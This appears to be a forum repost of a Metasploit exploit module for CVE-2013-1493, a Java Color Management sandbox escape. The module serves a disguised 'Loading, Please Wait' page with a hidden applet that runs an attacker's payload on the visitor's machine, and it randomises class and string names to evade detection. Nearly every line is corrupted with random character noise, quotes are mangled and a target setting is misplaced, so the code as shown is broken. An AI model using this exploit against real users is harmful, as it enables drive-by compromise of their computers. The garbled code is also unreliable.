##
7 J$ K3 k5 Q2 P+ S! q8 N: u9 j3 p5 ^: Q
# This file is part of the Metasploit Framework and may be subject to
9 [# s. L+ g' [8 s0 S5 h7 w# redistribution and commercial restrictions. Please see the Metasploit
* K/ P! x, J5 p8 K1 b# web site for more information on licensing and terms of use.) z2 u1 W# ~6 X% h1 g5 v0 V
# http://metasploit.com/% s7 Q# |# W: H6 B; M" ~4 l5 k+ K
##, s: k- m; v& Q. S4 x
require ‘msf/core’: P; m4 i; q/ t' e9 A: f
require ‘rex’
, B5 b. @* a: H- P% j2 kclass Metasploit3 < Msf::Exploit::Remote
6 K' K8 s0 V) hRank = NormalRanking+ p; w$ Q! [ ^' Q, I# B
include Msf::Exploit::Remote::HttpServer::HTML
7 s6 t6 q% x5 I$ H- Y. ?. Dinclude Msf::Exploit::EXE
2 V! z5 x$ t0 L8 ^- G. C: }, Linclude Msf::Exploit::Remote::BrowserAutopwn
' p0 @$ c- b) n+ d* W# M$ bautopwn_info({ :javascript => false })# s; u o: \( s- D% X0 E z
def initialize( info = {} ); A( T( n( w+ c7 \8 h' n& i$ D
super( update_info( info,
3 `5 e2 U" Y6 A J5 \. j" u‘Name’ => ‘Java CMM Remote Code Execution’,
4 W; \! b- z7 Q7 O0 m' L& g( S! H‘Description’ => %q{
' G0 w1 l" F5 l4 a6 w8 t$ {This module abuses the Color Management classes from a Java Applet to run
( o% V, E/ {: {% x/ karbitrary Java code outside of the sandbox as exploited in the wild in February! P. t3 d8 H7 P" a' m$ n
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
6 c! g9 _- u. t' ` W9 S) \and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
' \6 H$ }3 V) G3 ?9 ^systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
/ {9 V6 o9 y' c& [: ~2 J/ J- E( }warning in order to run the malicious applet.9 W- s) u0 I3 m. i
},% C9 @5 d. C. a$ c: {. [0 c% h- ]
‘License’ => MSF_LICENSE,
# t4 @1 k+ ^6 }4 ]% X# V8 E‘Author’ =># Z. h1 }* P, W) n/ F( _# g2 z3 F
'Unknown', # Vulnerability discovery and Exploit5 M& n7 V( v" E* B% `5 j
'juan vazquez' # Metasploit module (just ported the published exploit)
5 |5 d2 Z. y5 _9 X- E],
/ ~2 D& f6 \4 W( B‘References’ =>
' }# H9 D3 \' `- R( |[( x T* I: W) X
[ 'CVE', '2013-1493' ],
7 L d. }$ t* N5 y, g' k# ^[ 'OSVDB', '90737' ],
+ C- D" L) O% G. J[ 'BID', '58238' ],
6 z4 @/ ~( a1 A1 R[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
6 N" M& t% \ R) t8 U4 g[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],4 u) E, ^4 O! ~& [7 p# F% g1 [- ^
[ 'URL', 'http://pastie.org/pastes/6581034' ]
1 x3 T) }# m" s8 l: ~9 j7 m],
0 E: @( F1 W% p6 I( X4 `/ v" n: W‘Platform’ => [ 'win', 'java' ],( ~5 o3 q5 @: V+ Z( {( R! [, p: |
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },% ^) T1 r) g7 _: u
‘Targets’ =>
8 E. Z: J& Y; l# W[4 ]. \0 g$ b5 K0 m/ ^6 v& o
[ 'Generic (Java Payload)',
2 b& L9 ? g A# n) {{
5 |' Y' A. @, t! i4 x6 t2 |'Platform' => 'java',1 k4 ?2 W: Z7 W, w+ R
'Arch' => ARCH_JAVA
' {$ u1 r! \$ R0 _}# p# N/ [7 T8 c7 Y' h3 `
],2 f4 I& o/ b. \" O4 w* S
[ 'Windows x86 (Native Payload)',4 V* X* ?, d" R V
{+ [7 m. w/ I" w' F- T0 O
'Platform' => 'win',( m' {9 r- U) X: l6 \* Z3 A
'Arch' => ARCH_X86
( o* ]! v' a0 T+ m$ ~. w: z}4 e M% X6 {, ^ X# J- A
]
@, t7 d+ j! h" t+ i/ g! p. S],
2 U% D% K- M ]7 V; ~4 C‘‘DisclosureDate’ => ‘Mar 01 2013′4 Y& Z6 F! g/ N7 k
))
( W% i( v& v: R# U. D: {end1 P# }1 M: ]' ~8 J# V/ N q
def setup- b6 H q. k; _9 `
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”). L4 ~& r% w+ ]5 Y: j+ d. e3 ]4 l4 O
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( J7 r; T3 ^; d* y* T5 w6 w
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”): }# L! U$ i1 q. y
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
: H1 ~" M) P! ~. C, W, R5 r3 Hpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)9 d7 s- U# f) P5 B2 u# i
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }, s6 u7 ]3 V; A; I" n
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”); ~6 F, I$ l5 Y# a. i
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
/ ` b1 R, T1 ^: t$ g1 K3 m3 w/ s@init_class_name = rand_text_alpha(“Init”.length)
7 Z1 r) s. c$ p" _! u/ A; W) d@init_class.gsub!(“Init”, @init_class_name)
0 O$ F4 i* |2 z( X1 B- Usuper; B- m7 r( T$ C7 B( n2 V4 x/ f
end
& u# q$ Y6 }, d2 c, O$ r+ z$ edef on_request_uri(cli, request) @5 U- n- j0 t/ ^6 p
print_status(“handling request for #{request.uri}”)
; S- s8 `" L0 }, m. j# c% A# M8 Pcase request.uri5 x2 W f7 F9 ]6 q/ l0 x
when /\.jar$/i6 w5 [2 s( `0 r1 U: |
jar = payload.encoded_jar
) @1 b q5 ~1 X9 A' yjar.add_file(“#{@init_class_name}.class”, @init_class)
6 E$ ~" O1 y1 M. q1 S) i$ b1 _jar.add_file(“Leak.class”, @leak_class)- i6 M8 ~* q+ `. R( G0 o- h; G
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
2 r% A' U5 g" e! S0 l9 Ijar.add_file(“MyColorSpace.class”, @color_space_class). v2 I9 D( f0 n8 a* X
DefaultTarget’ => 1,- {. c% K7 T/ `8 Z" v$ [9 Z8 W
metasploit_str = rand_text_alpha(“metasploit”.length)" o* T! w$ E6 S9 `4 O5 ~
payload_str = rand_text_alpha(“payload”.length); l( {! r+ |% z& G( W& s% ?0 e
jar.entries.each { |entry|
' a8 o4 b1 n3 r: a$ Wentry.name.gsub!(“metasploit”, metasploit_str) v* F% s7 D' O0 F% y) b# f2 t
entry.name.gsub!(“Payload”, payload_str)
+ \6 I2 x3 M8 A9 g6 ^2 Qentry.data = entry.data.gsub(“metasploit”, metasploit_str)! k- Q% Y( m$ m
entry.data = entry.data.gsub(“Payload”, payload_str)) Z; L5 V+ V8 |" J# ^3 [- D' ]- f# \
}
! R4 T% |/ y9 ]8 |& ^! r% Tjar.build_manifest
6 L& R% }2 K1 O* w9 C! gsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
$ X! n. F! g; f4 _when /\/$/' }2 e2 O# q; U
payload = regenerate_payload(cli)3 N* U- e. n" ^0 Y, \
if not payload; h; q4 Z, |' p- c: s( U; v
print_error(“Failed to generate the payload.”)
* k3 j2 h0 C7 g+ v8 msend_not_found(cli)! J! U+ H2 V- P
return
: d$ `) w2 T' ]1 b- M/ jend2 I e/ \' ^; @- g0 y* U. l
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })8 u j0 A8 J+ f
else
! Q" F0 h1 b( Z7 v' K& wsend_redirect(cli, get_resource() + ‘/’, ”)
1 ^, F$ U) q) W, ]& b3 `/ i) mend# G, [" M/ h) _
end
0 [/ I: v1 A9 B$ q) o: @; fdef generate_html, z3 f9 l3 [7 d; H: ^/ y* j
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
! f. n% a% a/ B0 e) shtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
( I. C- X: u# M; ^ q* S! @8 Thtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
% J$ e3 z& z( \& ]4 qhtml += %Q|</applet></body></html>|
- p0 l' Q7 l9 U6 k$ ^$ ?return html% c$ f3 T" x& K* A* l
end, v+ A* `- v6 A; _0 {3 G
end& B v. G3 j; t; c- B( X
end
- z$ X; k3 K, @7 q |
发表于 2013-4-4 17:31:17
收藏
支持
反对